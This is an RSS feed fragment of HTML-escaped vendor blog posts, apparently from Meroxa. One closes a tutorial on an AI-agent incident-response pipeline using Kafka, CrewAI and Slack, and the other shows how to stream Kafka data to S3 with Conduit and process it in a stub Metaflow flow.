&lt;hr&gt;
&lt;h3&gt;🧪 Start the Stack&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker-compose&lt;/span&gt; up &lt;span class=&quot;token parameter variable&quot;&gt;--build&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then test it:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-X&lt;/span&gt; POST http://localhost:5000/alert &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;-H&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Content-Type: application/json&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{&quot;alertname&quot;: &quot;HighMemoryUsage&quot;, &quot;instance&quot;: &quot;api-1&quot;, &quot;description&quot;: &quot;Memory &gt; 90%&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;✅ Done.&lt;/h3&gt;
&lt;p&gt;You now have a working autonomous pipeline that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Accepts alerts via HTTP&lt;/li&gt;
&lt;li&gt;Streams data in real time using Kafka&lt;/li&gt;
&lt;li&gt;Enriches it with OpenAI&lt;/li&gt;
&lt;li&gt;Triggers AI agents&lt;/li&gt;
&lt;li&gt;Notifies Slack with no human in the loop&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;💥 Extend It&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Trigger &lt;a href=&quot;https://www.pagerduty.com/&quot;&gt;PagerDuty&lt;/a&gt; or &lt;a href=&quot;https://github.com/features/actions&quot;&gt;GitHub Actions&lt;/a&gt; based on agent output&lt;/li&gt;
&lt;li&gt;Route alerts by team, urgency, or region&lt;/li&gt;
&lt;li&gt;Store incident data in S3/Postgres for postmortems&lt;/li&gt;
&lt;li&gt;Add human-in-the-loop escalation if confidence is low&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;🧠 Takeaway&lt;/h3&gt;
&lt;p&gt;This isn’t just another monitoring pipeline. It’s the foundation of an &lt;strong&gt;autonomous incident response system&lt;/strong&gt; powered by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Conduit&lt;/strong&gt;: Real-time data movement and enrichment&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CrewAI&lt;/strong&gt;: Agentic orchestration with role-based reasoning&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka&lt;/strong&gt;: Scalable, decoupled message routing&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slack&lt;/strong&gt;: Fast, familiar team communication&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ready to build autonomous systems that don&apos;t just think, but act? The future of incident response isn&apos;t about faster alerts — it&apos;s about intelligent systems that understand, communicate, and solve problems in real-time.&lt;/p&gt;
&lt;p&gt;Your next-generation incident response system is just a few commands away. Start with this demo, then imagine what you could build when you combine:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Streaming data pipelines with &lt;a href=&quot;https://conduit.io&quot;&gt;Conduit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Autonomous agents with &lt;a href=&quot;https://crewai.com&quot;&gt;CrewAI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Real-time communication with your team&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Don&apos;t wait for the next incident. Build your autonomous response system today.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Supercharge Your Metaflow Pipelines with Conduit’s Real-Time Connectors]]></title><description><![CDATA[Learn how to integrate Conduit with Metaflow to build real-time machine learning pipelines. Stream data from Kafka to S3 and process it with Metaflow—all in one seamless workflow.]]></description><link>https://meroxa.com/blog/supercharge-your-metaflow-pipelines-with-conduits-real-time-connectors</link><guid isPermaLink="false">https://meroxa.com/blog/supercharge-your-metaflow-pipelines-with-conduits-real-time-connectors</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 22 May 2025 16:53:00 GMT</pubDate><content:encoded>&lt;p&gt;If you’ve used &lt;a href=&quot;https://metaflow.org/&quot;&gt;Metaflow&lt;/a&gt; to orchestrate data science workflows, you know how powerful and intuitive it is. But feeding those workflows with real-time data? That’s where things can get messy—especially if you’re stitching together multiple tools just to get data from Kafka into S3, or wrangling batch jobs to keep everything in sync.&lt;/p&gt;
&lt;p&gt;This post shows you how to simplify that entire process using &lt;strong&gt;&lt;a href=&quot;https://conduit.io&quot;&gt;Conduit&lt;/a&gt;&lt;/strong&gt;. Pairing Conduit with Metaflow gives you an efficient, maintainable, and reproducible data pipeline that flows from raw event to insight.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;How Conduit Fits In&lt;/h2&gt;
&lt;p&gt;Metaflow handles orchestration: steps, parameters, and execution. What it doesn’t do is handle real-time ingestion. That’s where Conduit comes in. It connects to &lt;a href=&quot;https://conduit.io/docs/using/connectors/list&quot;&gt;live sources&lt;/a&gt; (like Kafka, Postgres, MongoDB) and pushes cleaned, structured records to sinks like S3 or cloud databases. It’s lightweight, fast, and written in Go.&lt;/p&gt;
&lt;p&gt;Together, they form a clean architecture:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/2ffca0e21eac70228a4c7862d0349070/a5c81/mermaid-diagram-2025-05-22-165045.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 101%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAABwklEQVR42q2VW1PCMBCFUZSKgohavCvIjHdHpfekaXrhUkH//885bsLggwMOVB92ujNJvp7N9mxL61tH+BmlSgs7e5cQcQbXZwijWIfjBQhlilrzivaYmHt2PtBEbf8SwzxHJCPIOKanhIgiDEY56gdTYHklYHMKVOEFARjnOh+MRqjvrwykkgk4eh8jH48RCqEVqnyYvxcBmlRWm+5N4rXXAw+Fjpe3N3Aqu3HYWRG4aaJhdvSd3d/fIQw5ARlub2/oJQLNVpf2HKJcXRK4ZrSwuXOKs/bDd5x3Hr/zCq2pPUt3WUPpHstUVs/l8HkMJlK82AwbBFJri84tBKrGVHfP8fH5SaWH1BSB8WSiv89SUeAWAZOsjyTNkA36kEmK7b2L4kClUEFcz9MhZPw/CmWSIOv/k0KlyvN9BIyBi0h/8It8vJTC/nCoXRKTSqX2TwpnJfsBQ0Bejv5UsjEF5uTnJE3pDjMMaDjophgFFSpHyCSDZTuwHZfmYwqjflYMqKLauEDz6Jrs9kTWe6a8q0v+7cxCL1dqp/C4gOU4NBgi3WHLthFQvrF9spqXZ8PBcgP9C1CjfxaWx2jKHGPdmK/wC038+zSi4t0gAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Conduit to Metaflow Architecture&quot;
        title=&quot;Conduit to Metaflow Architecture&quot;
        src=&quot;/static/2ffca0e21eac70228a4c7862d0349070/5a190/mermaid-diagram-2025-05-22-165045.png&quot;
        srcset=&quot;/static/2ffca0e21eac70228a4c7862d0349070/772e8/mermaid-diagram-2025-05-22-165045.png 200w,
/static/2ffca0e21eac70228a4c7862d0349070/e17e5/mermaid-diagram-2025-05-22-165045.png 400w,
/static/2ffca0e21eac70228a4c7862d0349070/5a190/mermaid-diagram-2025-05-22-165045.png 800w,
/static/2ffca0e21eac70228a4c7862d0349070/c1b63/mermaid-diagram-2025-05-22-165045.png 1200w,
/static/2ffca0e21eac70228a4c7862d0349070/29007/mermaid-diagram-2025-05-22-165045.png 1600w,
/static/2ffca0e21eac70228a4c7862d0349070/a5c81/mermaid-diagram-2025-05-22-165045.png 2333w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;What You’ll Need&lt;/h2&gt;
&lt;p&gt;You’ll want:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Python 3.7 or higher&lt;/li&gt;
&lt;li&gt;Docker&lt;/li&gt;
&lt;li&gt;AWS CLI set up (for S3 or Batch)&lt;/li&gt;
&lt;li&gt;Conduit v0.14.0 or later&lt;/li&gt;
&lt;li&gt;Metaflow v2.7.0 or later&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Set Up Kafka Locally&lt;/h3&gt;
&lt;p&gt;If you don’t already have a Kafka cluster, here’s how to spin one up for testing:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;9092&lt;/span&gt;:9092 apache/kafka:4.0.0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h2&gt;Getting Conduit Running&lt;/h2&gt;
&lt;p&gt;Install Conduit (choose what works for you):&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;macOS:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;brew tap conduitio/conduit
brew &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Linux / other:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; https://conduit.io/install.sh &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;bash&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To verify:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit version&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Use the &lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; command to &lt;a href=&quot;https://conduit.io/docs/getting-started#build-a-pipeline&quot;&gt;scaffold a pipeline in your preferred directory&lt;/a&gt;. Replace the default YAML file in the &lt;code class=&quot;language-text&quot;&gt;/pipelines&lt;/code&gt; directory with the below YAML file.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.2&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; orders&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;servers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:9092&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;groupID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;conduit-orders-group&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; s3&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; s3
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.bucket&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-data-bucket&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-west-2&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.accessKeyId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;ACCESS_KEY&gt;&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.secretAccessKey&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;SECRET_KEY&gt;&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;prefix&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders/&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;sdk.batch.delay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;10s&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then launch Conduit with the below command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit run&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h2&gt;Building the Metaflow Flow&lt;/h2&gt;
&lt;p&gt;Once Conduit is writing events to S3, your Metaflow script can take it from there.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; metaflow &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; FlowSpec&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; step&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Parameter
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; boto3&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; json

&lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;OrdersFlow&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;FlowSpec&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    s3_bucket &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Parameter&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;s3_bucket&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; default&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;my-data-bucket&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;start&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; boto3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;client&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;s3&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        objs &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;list_objects_v2&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;Bucket&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3_bucket&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Prefix&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;orders/&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;files &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;o&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Key&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; o &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; objs&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Contents&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;preprocess&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;preprocess&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; key &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;files&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            content &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get_object&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;Bucket&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;s3_bucket&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Key&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Body&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;read&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;loads&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;content&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;extend&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; r &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; records &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;status&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;cancelled&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;train&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;train&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; pandas &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; pd
        df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DataFrame&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;model &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;model-artifact&apos;&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;evaluate&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;evaluate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;metrics &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;accuracy&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.95&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;metrics&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;next&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;end&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;end&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Done&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

